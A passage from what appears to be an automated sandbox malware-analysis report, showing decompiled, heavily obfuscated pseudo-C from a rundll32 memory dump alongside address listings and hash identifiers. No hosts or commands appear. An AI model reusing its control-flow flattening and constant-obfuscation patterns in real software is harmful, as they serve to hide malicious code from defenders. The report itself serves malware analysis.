                                                                                                                    										_t700 = E00344624(_v224, _v108, _v232, _v144,  &_v112, _v328, _v120);
                                                                                                                    										_t847 = _t847 + 0x14;
                                                                                                                    										__eflags = _t700;
                                                                                                                    										_t747 = 0xb34e23f;
                                                                                                                    										_t725 =  ==  ? 0xb34e23f : 0xcc5fcc9;
                                                                                                                    										goto L2;
                                                                                                                    									} else {
                                                                                                                    										if(_t725 == 0x24fa5ba) {
                                                                                                                    											_push(_v212);
                                                                                                                    											_push(_v156);
                                                                                                                    											_t701 = E0034DCF7(_v376, 0x331984, __eflags);
                                                                                                                    											_push(_v236);
                                                                                                                    											_push(_v124);
                                                                                                                    											_t704 = E00339462(_t701, _v368,  &_v116, E0034DCF7(_v268, 0x331814, __eflags), _v256, _v136);
                                                                                                                    											_t847 = _t847 + 0x24;
                                                                                                                    											__eflags = _t704 - _v240;
                                                                                                                    											_t725 =  ==  ? 0xec78b05 : 0xc75135f;
                                                                                                                    											E0033A8B0(_v352, _t701, _v360);
                                                                                                                    											E0033A8B0(_v336, _t702, _v344);
                                                                                                                    											_t840 = 0xcf5796f;
                                                                                                                    											goto L13;
                                                                                                                    										} else {
                                                                                                                    											if(_t725 == 0x505fe8e) {
                                                                                                                    												_t631 =  &_v208; // 0x39346367
                                                                                                                    												E0033957D(_v116, _v160,  *_t631, _v272, _v280);
                                                                                                                    											} else {
                                                                                                                    												if(_t725 == _t842) {
                                                                                                                    													_push(_v340);
                                                                                                                    													_push(_v180);
                                                                                                                    													_t710 = E0034DCF7(_v148, 0x331854, __eflags);
                                                                                                                    													_pop(_t763);
                                                                                                                    													_t844 = _t710;
                                                                                                                    													_t711 = 0x48;
                                                                                                                    													_v104 = _t711;
                                                                                                                    													_t713 = E00331C45(_v120,  &_v104,  &_v76, _v252, _v140, _v300, _v204, _t710, _v332, _v276, _t763, _t711);
                                                                                                                    													_t847 = _t847 + 0x28;
                                                                                                                    													__eflags = _t713 - _v164;
                                                                                                                    													if(_t713 != _v164) {
                                                                                                                    														_t725 = _t840;
                                                                                                                    													} else {
                                                                                                                    														_t834 =  *0x353dfc; // 0x0
                                                                                                                    														E0033ED7E(_v244, _t834, _v228,  &_v68, 0x40);
                                                                                                                    														_t847 = _t847 + 0xc;
                                                                                                                    														_t725 = 0x9bcfe4f;
                                                                                                                    													}
                                                                                                                    													E0033A8B0(_v132, _t844, _v384);
                                                                                                                    													goto L13;
                                                                                                                    												} else {
                                                                                                                    													if(_t725 == 0x7252bf3) {
                                                                                                                    														_t725 = 0x24fa5ba;
                                                                                                                    														continue;
                                                                                                                    													} else {
                                                                                                                    														if(_t725 == _t819) {
                                                                                                                    															_t717 = E0033B144(_v120, _v188, _v308, _v128, _v348, _v292);
                                                                                                                    															_t847 = _t847 + 0x10;
                                                                                                                    															__eflags = _t717 - _v152;
                                                                                                                    															_t725 =  ==  ? _t842 : _t840;
                                                                                                                    															while(1) {
                                                                                                                    																L1:
                                                                                                                    																_t747 = 0xb34e23f;
                                                                                                                    																L2:
                                                                                                                    																L3:
                                                                                                                    																_t690 = 0xa0b11f8;
                                                                                                                    																goto L4;
                                                                                                                    															}
                                                                                                                    														} else {
                                                                                                                    															_t856 = _t725 - 0x9bcfe4f;
                                                                                                                    															if(_t725 == 0x9bcfe4f) {
                                                                                                                    																_push(_v172);
                                                                                                                    																_push(_v380);
                                                                                                                    																_t719 = E0034DCF7(_v324, 0x331854, _t856);
                                                                                                                    																_pop(_t772);
                                                                                                                    																E0033AA4D(_v364, _t719,  *((intOrPtr*)(_v100 + 4)), _v284, _v196, _v116,  &_v108, _v264, _t772,  *_v100, _v372);
                                                                                                                    																_t725 =  ==  ? 0xa0b11f8 : _t840;
                                                                                                                    																E0033A8B0(_v220, _t719, _v356);
                                                                                                                    																_t847 = _t847 + 0x2c;
                                                                                                                    																L13:
                                                                                                                    																_t842 = 0x6cd454e;
                                                                                                                    																L32:
                                                                                                                    																_t819 = 0x9b01f0f;
                                                                                                                    																_t747 = 0xb34e23f;
                                                                                                                    																_t690 = 0xa0b11f8;
                                                                                                                    															}
                                                                                                                    															goto L33;
                                                                                                                    														}
                                                                                                                    													}
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    									L36:
                                                                                                                    									return _t846;
                                                                                                                    								}
                                                                                                                    								__eflags = _t725 - _t747;
                                                                                                                    								if(_t725 == _t747) {
                                                                                                                    									_t691 = E00332BD9(_v112);
                                                                                                                    									_t725 = 0xb500bcf;
                                                                                                                    									__eflags = _t691;
                                                                                                                    									_t846 =  !=  ? 1 : _t846;
                                                                                                                    									goto L32;
                                                                                                                    								} else {
                                                                                                                    									__eflags = _t725 - 0xb500bcf;
                                                                                                                    									if(_t725 == 0xb500bcf) {
                                                                                                                    										E0034CA69(_v112, _v168, _v176);
                                                                                                                    										_t725 = 0xcc5fcc9;
                                                                                                                    										goto L1;
                                                                                                                    									} else {
                                                                                                                    										__eflags = _t725 - 0xcc5fcc9;
                                                                                                                    										if(_t725 == 0xcc5fcc9) {
                                                                                                                    											E0033A958(_v216, _v108, _v184);
                                                                                                                    											_t725 = _t840;
                                                                                                                    											while(1) {
                                                                                                                    												L1:
                                                                                                                    												_t747 = 0xb34e23f;
                                                                                                                    												goto L2;
                                                                                                                    											}
                                                                                                                    										} else {
                                                                                                                    											__eflags = _t725 - _t840;
                                                                                                                    											if(_t725 == _t840) {
                                                                                                                    												E0033A958(_v288, _v120, _v296);
                                                                                                                    												_t725 = 0x505fe8e;
                                                                                                                    												while(1) {
                                                                                                                    													L1:
                                                                                                                    													_t747 = 0xb34e23f;
                                                                                                                    													goto L2;
                                                                                                                    												}
                                                                                                                    											} else {
                                                                                                                    												__eflags = _t725 - 0xec78b05;
                                                                                                                    												if(__eflags != 0) {
                                                                                                                    													goto L33;
                                                                                                                    												} else {
                                                                                                                    													_v104 = _v96;
                                                                                                                    													_t697 = E003392C7(_v200, _v96, _v304, _v312,  &_v120, _v116, _v320);
                                                                                                                    													_t847 = _t847 + 0x14;
                                                                                                                    													__eflags = _t697 - _v192;
                                                                                                                    													_t819 = 0x9b01f0f;
                                                                                                                    													_t747 = 0xb34e23f;
                                                                                                                    													_t725 =  ==  ? 0x9b01f0f : 0x505fe8e;
                                                                                                                    													goto L3;
                                                                                                                    												}
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    								goto L36;
                                                                                                                    								L33:
                                                                                                                    							} while (_t725 != 0xc75135f);
                                                                                                                    							goto L36;
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    				}
                                                                                                                    			}
                                                                                                                    0x0033c3b7
                                                                                                                    0x0033c3cb
                                                                                                                    0x0033c3d2
                                                                                                                    0x0033c3dd
                                                                                                                    0x0033c3e8
                                                                                                                    0x0033c3f0
                                                                                                                    0x0033c3fa
                                                                                                                    0x0033c3fe
                                                                                                                    0x0033c406
                                                                                                                    0x0033c40e
                                                                                                                    0x0033c419
                                                                                                                    0x0033c424
                                                                                                                    0x0033c42c
                                                                                                                    0x0033c437
                                                                                                                    0x0033c43f
                                                                                                                    0x0033c447
                                                                                                                    0x0033c455
                                                                                                                    0x0033c456
                                                                                                                    0x0033c45b
                                                                                                                    0x0033c466
                                                                                                                    0x0033c46b
                                                                                                                    0x0033c46f
                                                                                                                    0x0033c477
                                                                                                                    0x0033c48a
                                                                                                                    0x0033c491
                                                                                                                    0x0033c49c
                                                                                                                    0x0033c4a7
                                                                                                                    0x0033c4b2
                                                                                                                    0x0033c4bd
                                                                                                                    0x0033c4c8
                                                                                                                    0x0033c4d0
                                                                                                                    0x0033c4dd
                                                                                                                    0x0033c4e6
                                                                                                                    0x0033c4ea
                                                                                                                    0x0033c4f2
                                                                                                                    0x0033c4fd
                                                                                                                    0x0033c505
                                                                                                                    0x0033c510
                                                                                                                    0x0033c51b
                                                                                                                    0x0033c523
                                                                                                                    0x0033c52e
                                                                                                                    0x0033c542
                                                                                                                    0x0033c549
                                                                                                                    0x0033c554
                                                                                                                    0x0033c55f
                                                                                                                    0x0033c572
                                                                                                                    0x0033c579
                                                                                                                    0x0033c584
                                                                                                                    0x0033c594
                                                                                                                    0x0033c5a1
                                                                                                                    0x0033c5a5
                                                                                                                    0x0033c5ad
                                                                                                                    0x0033c5b5
                                                                                                                    0x0033c5b9
                                                                                                                    0x0033c5c1
                                                                                                                    0x0033c5c9
                                                                                                                    0x0033c5d1
                                                                                                                    0x0033c5dc
                                                                                                                    0x0033c5e7
                                                                                                                    0x0033c5f2
                                                                                                                    0x0033c5fd
                                                                                                                    0x0033c608
                                                                                                                    0x0033c610
                                                                                                                    0x0033c61b
                                                                                                                    0x0033c623
                                                                                                                    0x0033c628
                                                                                                                    0x0033c62d
                                                                                                                    0x0033c635
                                                                                                                    0x0033c63d
                                                                                                                    0x0033c63d
                                                                                                                    0x0033c63d
                                                                                                                    0x0033c642
                                                                                                                    0x0033c642
                                                                                                                    0x0033c647
                                                                                                                    0x0033c647
                                                                                                                    0x0033c647
                                                                                                                    0x0033c64c
                                                                                                                    0x0033c64c
                                                                                                                    0x0033c64c
                                                                                                                    0x0033c64c
                                                                                                                    0x0033c64e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0033c654
                                                                                                                    0x0033c917
                                                                                                                    0x0033c91c
                                                                                                                    0x0033c924
                                                                                                                    0x0033c926
                                                                                                                    0x0033c92b
                                                                                                                    0x00000000
                                                                                                                    0x0033c65a
                                                                                                                    0x0033c660
                                                                                                                    0x0033c83b
                                                                                                                    0x0033c847
                                                                                                                    0x0033c852
                                                                                                                    0x0033c857
                                                                                                                    0x0033c865
                                                                                                                    0x0033c89e
                                                                                                                    0x0033c8a5
                                                                                                                    0x0033c8b4
                                                                                                                    0x0033c8c5
                                                                                                                    0x0033c8c8
                                                                                                                    0x0033c8d8
                                                                                                                    0x0033c8de
                                                                                                                    0x00000000
                                                                                                                    0x0033c666
                                                                                                                    0x0033c66c
                                                                                                                    0x0033ca66
                                                                                                                    0x0033ca7b
                                                                                                                    0x0033c672
                                                                                                                    0x0033c674
                                                                                                                    0x0033c779
                                                                                                                    0x0033c782
                                                                                                                    0x0033c790
                                                                                                                    0x0033c796
                                                                                                                    0x0033c799
                                                                                                                    0x0033c7a2
                                                                                                                    0x0033c7ac
                                                                                                                    0x0033c7e3
                                                                                                                    0x0033c7e8
                                                                                                                    0x0033c7eb
                                                                                                                    0x0033c7f2
                                                                                                                    0x0033c821
                                                                                                                    0x0033c7f4
                                                                                                                    0x0033c805
                                                                                                                    0x0033c812
                                                                                                                    0x0033c817
                                                                                                                    0x0033c81a
                                                                                                                    0x0033c81a
                                                                                                                    0x0033c830
                                                                                                                    0x00000000
                                                                                                                    0x0033c67a
                                                                                                                    0x0033c680
                                                                                                                    0x0033c76f
                                                                                                                    0x00000000
                                                                                                                    0x0033c686
                                                                                                                    0x0033c688
                                                                                                                    0x0033c752
                                                                                                                    0x0033c759
                                                                                                                    0x0033c765
                                                                                                                    0x0033c767
                                                                                                                    0x0033c63d
                                                                                                                    0x0033c63d
                                                                                                                    0x0033c63d
                                                                                                                    0x0033c642
                                                                                                                    0x0033c647
                                                                                                                    0x0033c647
                                                                                                                    0x00000000
                                                                                                                    0x0033c647
                                                                                                                    0x0033c68e
                                                                                                                    0x0033c68e
                                                                                                                    0x0033c694
                                                                                                                    0x0033c69a
                                                                                                                    0x0033c6a6
                                                                                                                    0x0033c6ae
                                                                                                                    0x0033c6b4
                                                                                                                    0x0033c6f8
                                                                                                                    0x0033c71c
                                                                                                                    0x0033c71f
                                                                                                                    0x0033c724
                                                                                                                    0x0033c727
                                                                                                                    0x0033c727
                                                                                                                    0x0033ca3e
                                                                                                                    0x0033ca3e
                                                                                                                    0x0033ca43
                                                                                                                    0x0033ca48
                                                                                                                    0x0033ca48
                                                                                                                    0x00000000
                                                                                                                    0x0033c694
                                                                                                                    0x0033c688
                                                                                                                    0x0033c680
                                                                                                                    0x0033c674
                                                                                                                    0x0033c66c
                                                                                                                    0x0033c660
                                                                                                                    0x0033ca85
                                                                                                                    0x0033ca8f
                                                                                                                    0x0033ca8f
                                                                                                                    0x0033c933
                                                                                                                    0x0033c935
                                                                                                                    0x0033ca2c
                                                                                                                    0x0033ca33
                                                                                                                    0x0033ca39
                                                                                                                    0x0033ca3b
                                                                                                                    0x00000000
                                                                                                                    0x0033c93b
                                                                                                                    0x0033c93b
                                                                                                                    0x0033c941
                                                                                                                    0x0033ca15
                                                                                                                    0x0033ca1b
                                                                                                                    0x00000000
                                                                                                                    0x0033c947
                                                                                                                    0x0033c947
                                                                                                                    0x0033c94d
                                                                                                                    0x0033c9f3
                                                                                                                    0x0033c9f9
                                                                                                                    0x0033c63d
                                                                                                                    0x0033c63d
                                                                                                                    0x0033c63d
                                                                                                                    0x00000000
                                                                                                                    0x0033c63d
                                                                                                                    0x0033c953
                                                                                                                    0x0033c953
                                                                                                                    0x0033c955
                                                                                                                    0x0033c9ce
                                                                                                                    0x0033c9d4
                                                                                                                    0x0033c63d
                                                                                                                    0x0033c63d
                                                                                                                    0x0033c63d
                                                                                                                    0x00000000
                                                                                                                    0x0033c63d
                                                                                                                    0x0033c957
                                                                                                                    0x0033c957
                                                                                                                    0x0033c95d
                                                                                                                    0x00000000
                                                                                                                    0x0033c963
                                                                                                                    0x0033c97c
                                                                                                                    0x0033c995
                                                                                                                    0x0033c99c
                                                                                                                    0x0033c9ab
                                                                                                                    0x0033c9ad
                                                                                                                    0x0033c9b2
                                                                                                                    0x0033c9b7
                                                                                                                    0x00000000
                                                                                                                    0x0033c9b7
                                                                                                                    0x0033c95d
                                                                                                                    0x0033c955
                                                                                                                    0x0033c94d
                                                                                                                    0x0033c941
                                                                                                                    0x00000000
                                                                                                                    0x0033ca4d
                                                                                                                    0x0033ca4d
                                                                                                                    0x00000000
                                                                                                                    0x0033ca59
                                                                                                                    0x0033c647
                                                                                                                    0x0033c642

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: ;<=$@_`$CA$D#$Kbf:$PB5$Y/c$cg.B$e($gc49$ll~$sJ$tEt$uP$vj$O~t$iS$ja*
                                                                                                                    • API String ID: 0-258179307
                                                                                                                    • Opcode ID: 62b3f826b71934d39e268c39c84f5b23f5f0a56fbe245a61988d9f0264baf4a3
                                                                                                                    • Instruction ID: 0c87e68ef2b9a7ad8d1ea861ba8e7e37c72b35f7285ea13de861e3df1f925616
                                                                                                                    • Opcode Fuzzy Hash: 62b3f826b71934d39e268c39c84f5b23f5f0a56fbe245a61988d9f0264baf4a3
                                                                                                                    • Instruction Fuzzy Hash: 4D72F171509381DFD379CF25C58AA9BBBE2BBC4304F10891DE6DA9A260D7B18949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E00344B87(void* __ecx) {
                                                                                                                    				char _v524;
                                                                                                                    				char _v1044;
                                                                                                                    				char _v1564;
                                                                                                                    				char _v2084;
                                                                                                                    				char _v2604;
                                                                                                                    				signed int _v2608;
                                                                                                                    				intOrPtr _v2612;
                                                                                                                    				intOrPtr _v2616;
                                                                                                                    				intOrPtr _v2620;
                                                                                                                    				intOrPtr _v2624;
                                                                                                                    				char _v2628;
                                                                                                                    				intOrPtr _v2632;
                                                                                                                    				char _v2636;
                                                                                                                    				signed int _v2640;
                                                                                                                    				signed int _v2644;
                                                                                                                    				signed int _v2648;
                                                                                                                    				signed int _v2652;
                                                                                                                    				signed int _v2656;
                                                                                                                    				signed int _v2660;
                                                                                                                    				signed int _v2664;
                                                                                                                    				signed int _v2668;
                                                                                                                    				signed int _v2672;
                                                                                                                    				signed int _v2676;
                                                                                                                    				signed int _v2680;
                                                                                                                    				signed int _v2684;
                                                                                                                    				signed int _v2688;
                                                                                                                    				signed int _v2692;
                                                                                                                    				signed int _v2696;
                                                                                                                    				signed int _v2700;
                                                                                                                    				signed int _v2704;
                                                                                                                    				signed int _v2708;
                                                                                                                    				signed int _v2712;
                                                                                                                    				signed int _v2716;
                                                                                                                    				signed int _v2720;
                                                                                                                    				signed int _v2724;
                                                                                                                    				signed int _v2728;
                                                                                                                    				signed int _v2732;
                                                                                                                    				signed int _v2736;
                                                                                                                    				signed int _v2740;
                                                                                                                    				signed int _v2744;
                                                                                                                    				signed int _v2748;
                                                                                                                    				signed int _v2752;
                                                                                                                    				signed int _v2756;
                                                                                                                    				signed int _v2760;
                                                                                                                    				signed int _v2764;
                                                                                                                    				signed int _v2768;
                                                                                                                    				signed int _v2772;
                                                                                                                    				signed int _v2776;
                                                                                                                    				signed int _v2780;
                                                                                                                    				signed int _v2784;
                                                                                                                    				signed int _v2788;
                                                                                                                    				signed int _v2792;
                                                                                                                    				signed int _v2796;
                                                                                                                    				signed int _v2800;
                                                                                                                    				signed int _v2804;
                                                                                                                    				signed int _v2808;
                                                                                                                    				signed int _v2812;
                                                                                                                    				signed int _v2816;
                                                                                                                    				signed int _v2820;
                                                                                                                    				signed int _v2824;
                                                                                                                    				signed int _v2828;
                                                                                                                    				signed int _v2832;
                                                                                                                    				signed int _v2836;
                                                                                                                    				signed int _v2840;
                                                                                                                    				signed int _v2844;
                                                                                                                    				signed int _v2848;
                                                                                                                    				signed int _v2852;
                                                                                                                    				signed int _v2856;
                                                                                                                    				signed int _v2860;
                                                                                                                    				signed int _v2864;
                                                                                                                    				signed int _v2868;
                                                                                                                    				signed int _v2872;
                                                                                                                    				signed int _v2876;
                                                                                                                    				signed int _v2880;
                                                                                                                    				signed int _v2884;
                                                                                                                    				signed int _v2888;
                                                                                                                    				signed int _v2892;
                                                                                                                    				signed int _v2896;
                                                                                                                    				signed int _v2900;
                                                                                                                    				signed int _v2904;
                                                                                                                    				signed int _v2908;
                                                                                                                    				signed int _v2912;
                                                                                                                    				signed int _v2916;
                                                                                                                    				signed int _v2920;
                                                                                                                    				signed int _v2924;
                                                                                                                    				signed int _v2928;
                                                                                                                    				void* _t703;
                                                                                                                    				void* _t707;
                                                                                                                    				signed int _t708;
                                                                                                                    				signed int _t717;
                                                                                                                    				void* _t730;
                                                                                                                    				void* _t736;
                                                                                                                    				signed int _t738;
                                                                                                                    				signed int _t739;
                                                                                                                    				signed int _t740;
                                                                                                                    				signed int _t741;
                                                                                                                    				signed int _t742;
                                                                                                                    				signed int _t743;
                                                                                                                    				signed int _t744;
                                                                                                                    				signed int _t745;
                                                                                                                    				void* _t758;
                                                                                                                    				signed int _t798;
                                                                                                                    				void* _t803;
                                                                                                                    				void* _t804;
                                                                                                                    				void* _t811;
                                                                                                                    
                                                                                                                    				_v2608 = _v2608 & 0x00000000;
                                                                                                                    				_v2616 = 0xa2c333;
                                                                                                                    				_v2612 = 0xd97943;
                                                                                                                    				_v2696 = 0x74b91;
                                                                                                                    				_v2696 = _v2696 + 0xffffab65;
                                                                                                                    				_v2696 = _v2696 ^ 0x0006f6df;
                                                                                                                    				_v2804 = 0x130b03;
                                                                                                                    				_v2804 = _v2804 << 9;
                                                                                                                    				_v2804 = _v2804 + 0x8374;
                                                                                                                    				_v2804 = _v2804 ^ 0x26068974;
                                                                                                                    				_v2876 = 0x240a80;
                                                                                                                    				_v2876 = _v2876 >> 6;
                                                                                                                    				_v2876 = _v2876 >> 5;
                                                                                                                    				_v2876 = _v2876 ^ 0x3e269fec;
                                                                                                                    				_v2876 = _v2876 ^ 0x3e253447;
                                                                                                                    				_v2924 = 0x49db5b;
                                                                                                                    				_v2924 = _v2924 + 0xd552;
                                                                                                                    				_t803 = __ecx;
                                                                                                                    				_t798 = 0xce4571;
                                                                                                                    				_t738 = 0x27;
                                                                                                                    				_v2924 = _v2924 / _t738;
                                                                                                                    				_v2924 = _v2924 + 0x3019;
                                                                                                                    				_v2924 = _v2924 ^ 0x0006d24f;
                                                                                                                    				_v2796 = 0xf8ea63;
                                                                                                                    				_v2796 = _v2796 << 3;
                                                                                                                    				_v2796 = _v2796 + 0x8798;
                                                                                                                    				_v2796 = _v2796 ^ 0x07c9cae5;
                                                                                                                    				_v2864 = 0x679d3b;
                                                                                                                    				_t739 = 0x25;
                                                                                                                    				_v2864 = _v2864 * 0x7a;
                                                                                                                    				_v2864 = _v2864 / _t739;
                                                                                                                    				_v2864 = _v2864 << 0xc;
                                                                                                                    				_v2864 = _v2864 ^ 0x5a5eda92;
                                                                                                                    				_v2688 = 0xbc1f25;
                                                                                                                    				_v2688 = _v2688 << 0xd;
                                                                                                                    				_v2688 = _v2688 ^ 0x83e15555;
                                                                                                                    				_v2700 = 0xc3e9b4;
                                                                                                                    				_v2700 = _v2700 ^ 0x7e7d7a5b;
                                                                                                                    				_v2700 = _v2700 ^ 0x7ebc2479;
                                                                                                                    				_v2684 = 0x348655;
                                                                                                                    				_v2684 = _v2684 + 0xffff5240;
                                                                                                                    				_v2684 = _v2684 ^ 0x0038d539;
                                                                                                                    				_v2836 = 0xc8c90d;
                                                                                                                    				_v2836 = _v2836 | 0x6050777e;
                                                                                                                    				_v2836 = _v2836 + 0xfffffb37;
                                                                                                                    				_v2836 = _v2836 << 0xe;
                                                                                                                    				_v2836 = _v2836 ^ 0x3ea8df0c;
                                                                                                                    				_v2664 = 0x4ea234;
                                                                                                                    				_v2664 = _v2664 ^ 0x152f142f;
                                                                                                                    				_v2664 = _v2664 ^ 0x1568dd81;
                                                                                                                    				_v2900 = 0xa78742;
                                                                                                                    				_v2900 = _v2900 * 0x70;
                                                                                                                    				_v2900 = _v2900 + 0x89c7;
                                                                                                                    				_v2900 = _v2900 * 0x26;
                                                                                                                    				_v2900 = _v2900 ^ 0xe13351a3;
                                                                                                                    				_v2752 = 0x43c729;
                                                                                                                    				_v2752 = _v2752 * 9;
                                                                                                                    				_v2752 = _v2752 >> 0xc;
                                                                                                                    				_v2752 = _v2752 ^ 0x0004a0a7;
                                                                                                                    				_v2656 = 0x163ba0;
                                                                                                                    				_v2656 = _v2656 | 0x3b2cca0a;
                                                                                                                    				_v2656 = _v2656 ^ 0x3b3c61f3;
                                                                                                                    				_v2800 = 0x539f85;
                                                                                                                    				_v2800 = _v2800 + 0xffff9927;
                                                                                                                    				_v2800 = _v2800 >> 0xd;
                                                                                                                    				_v2800 = _v2800 ^ 0x000ca278;
                                                                                                                    				_v2892 = 0xaa9f70;
                                                                                                                    				_v2892 = _v2892 | 0xffd04745;
                                                                                                                    				_t740 = 0x33;
                                                                                                                    				_v2892 = _v2892 * 0x48;
                                                                                                                    				_v2892 = _v2892 + 0xabed;
                                                                                                                    				_v2892 = _v2892 ^ 0xfe85b4b6;
                                                                                                                    				_v2728 = 0x66b1f8;
                                                                                                                    				_v2728 = _v2728 + 0xffffb85a;
                                                                                                                    				_v2728 = _v2728 + 0xffff17c5;
                                                                                                                    				_v2728 = _v2728 ^ 0x00666892;
                                                                                                                    				_v2792 = 0x34b823;
                                                                                                                    				_v2792 = _v2792 + 0x705f;
                                                                                                                    				_v2792 = _v2792 | 0x13d147dd;
                                                                                                                    				_v2792 = _v2792 ^ 0x13fd2081;
                                                                                                                    				_v2884 = 0x7f5269;
                                                                                                                    				_v2884 = _v2884 >> 0x10;
                                                                                                                    				_v2884 = _v2884 + 0xdf59;
                                                                                                                    				_v2884 = _v2884 ^ 0x086ba2e3;
                                                                                                                    				_v2884 = _v2884 ^ 0x086346ed;
                                                                                                                    				_v2784 = 0x4150c;
                                                                                                                    				_v2784 = _v2784 ^ 0xadfae27c;
                                                                                                                    				_v2784 = _v2784 << 0xf;
                                                                                                                    				_v2784 = _v2784 ^ 0x7bb89155;
                                                                                                                    				_v2860 = 0x3ff4f9;
                                                                                                                    				_v2860 = _v2860 + 0x97ef;
                                                                                                                    				_v2860 = _v2860 ^ 0x8a52113e;
                                                                                                                    				_v2860 = _v2860 * 0x3b;
                                                                                                                    				_v2860 = _v2860 ^ 0xd244680a;
                                                                                                                    				_v2920 = 0xf20633;
                                                                                                                    				_v2920 = _v2920 >> 0xa;
                                                                                                                    				_v2920 = _v2920 << 6;
                                                                                                                    				_v2920 = _v2920 | 0x86ded8f3;
                                                                                                                    				_v2920 = _v2920 ^ 0x86d0715a;
                                                                                                                    				_v2676 = 0xbc4416;
                                                                                                                    				_v2676 = _v2676 + 0x253a;
                                                                                                                    				_v2676 = _v2676 ^ 0x00bded5f;
                                                                                                                    				_v2928 = 0x15fa7c;
                                                                                                                    				_v2928 = _v2928 >> 1;
                                                                                                                    				_v2928 = _v2928 * 0x6e;
                                                                                                                    				_v2928 = _v2928 >> 4;
                                                                                                                    				_v2928 = _v2928 ^ 0x00445a38;
                                                                                                                    				_v2844 = 0xaff44e;
                                                                                                                    				_v2844 = _v2844 * 0x28;
                                                                                                                    				_v2844 = _v2844 ^ 0x281c7ad4;
                                                                                                                    				_v2844 = _v2844 * 0xe;
                                                                                                                    				_v2844 = _v2844 ^ 0xcf625ac8;
                                                                                                                    				_v2744 = 0x5c05ba;
                                                                                                                    				_v2744 = _v2744 << 1;
                                                                                                                    				_v2744 = _v2744 ^ 0x54918a83;
                                                                                                                    				_v2744 = _v2744 ^ 0x542c1472;
                                                                                                                    				_v2904 = 0xa399f4;
                                                                                                                    				_v2904 = _v2904 / _t740;
                                                                                                                    				_t741 = 9;
                                                                                                                    				_v2904 = _v2904 / _t741;
                                                                                                                    				_v2904 = _v2904 >> 0xb;
                                                                                                                    				_v2904 = _v2904 ^ 0x000d27e7;
                                                                                                                    				_v2912 = 0xbe4d5b;
                                                                                                                    				_v2912 = _v2912 << 2;
                                                                                                                    				_v2912 = _v2912 >> 8;
                                                                                                                    				_v2912 = _v2912 + 0xbc5;
                                                                                                                    				_v2912 = _v2912 ^ 0x000f01bd;
                                                                                                                    				_v2888 = 0xb7f9c;
                                                                                                                    				_v2888 = _v2888 ^ 0x23a090a0;
                                                                                                                    				_v2888 = _v2888 + 0xffffcb65;
                                                                                                                    				_v2888 = _v2888 + 0xffffb53f;
                                                                                                                    				_v2888 = _v2888 ^ 0x23a896a2;
                                                                                                                    				_v2776 = 0xcbb323;
                                                                                                                    				_v2776 = _v2776 + 0x81c3;
                                                                                                                    				_v2776 = _v2776 >> 1;
                                                                                                                    				_v2776 = _v2776 ^ 0x00676393;
                                                                                                                    				_v2648 = 0x271f91;
                                                                                                                    				_v2648 = _v2648 + 0xffff9397;
                                                                                                                    				_v2648 = _v2648 ^ 0x0029f035;
                                                                                                                    				_v2896 = 0x78618c;
                                                                                                                    				_v2896 = _v2896 << 0xc;
                                                                                                                    				_v2896 = _v2896 ^ 0x0a821cde;
                                                                                                                    				_v2896 = _v2896 + 0xb475;
                                                                                                                    				_v2896 = _v2896 ^ 0x8c94da80;
                                                                                                                    				_v2720 = 0xacdc2a;
                                                                                                                    				_v2720 = _v2720 | 0x57611697;
                                                                                                                    				_v2720 = _v2720 ^ 0xc01b1ef4;
                                                                                                                    				_v2720 = _v2720 ^ 0x97fc8dfe;
                                                                                                                    				_v2668 = 0x55603e;
                                                                                                                    				_v2668 = _v2668 >> 1;
                                                                                                                    				_v2668 = _v2668 ^ 0x002dad1d;
                                                                                                                    				_v2828 = 0xf126f6;
                                                                                                                    				_t742 = 0x29;
                                                                                                                    				_v2828 = _v2828 * 0x43;
                                                                                                                    				_v2828 = _v2828 + 0x8cbb;
                                                                                                                    				_v2828 = _v2828 ^ 0x3f126f56;
                                                                                                                    				_v2768 = 0x9c087b;
                                                                                                                    				_v2768 = _v2768 << 9;
                                                                                                                    				_v2768 = _v2768 + 0xffffe171;
                                                                                                                    				_v2768 = _v2768 ^ 0x3813f585;
                                                                                                                    				_v2880 = 0xb815a3;
                                                                                                                    				_v2880 = _v2880 ^ 0x72879ea7;
                                                                                                                    				_v2880 = _v2880 / _t742;
                                                                                                                    				_v2880 = _v2880 + 0xc3b;
                                                                                                                    				_v2880 = _v2880 ^ 0x02c00b8a;
                                                                                                                    				_v2872 = 0xffe9a8;
                                                                                                                    				_v2872 = _v2872 | 0x05f4b9e7;
                                                                                                                    				_v2872 = _v2872 + 0xffff2424;
                                                                                                                    				_v2872 = _v2872 << 7;
                                                                                                                    				_v2872 = _v2872 ^ 0xff8a2c7e;
                                                                                                                    				_v2808 = 0x17a98a;
                                                                                                                    				_t743 = 0x6a;
                                                                                                                    				_v2808 = _v2808 * 0x35;
                                                                                                                    				_v2808 = _v2808 + 0x8a0b;
                                                                                                                    				_v2808 = _v2808 ^ 0x04e27d5d;
                                                                                                                    				_v2644 = 0x3aca8c;
                                                                                                                    				_v2644 = _v2644 | 0x1dba2023;
                                                                                                                    				_v2644 = _v2644 ^ 0x1dba33fd;
                                                                                                                    				_v2760 = 0xa9a4ba;
                                                                                                                    				_v2760 = _v2760 ^ 0x6721c4f3;
                                                                                                                    				_v2760 = _v2760 + 0xffff7b43;
                                                                                                                    				_v2760 = _v2760 ^ 0x6786e634;
                                                                                                                    				_v2660 = 0xef5940;
                                                                                                                    				_t327 =  &_v2660; // 0xef5940
                                                                                                                    				_v2660 =  *_t327 / _t743;
                                                                                                                    				_v2660 = _v2660 ^ 0x0008b7a5;
                                                                                                                    				_v2640 = 0x8c91f9;
                                                                                                                    				_v2640 = _v2640 + 0x2aa0;
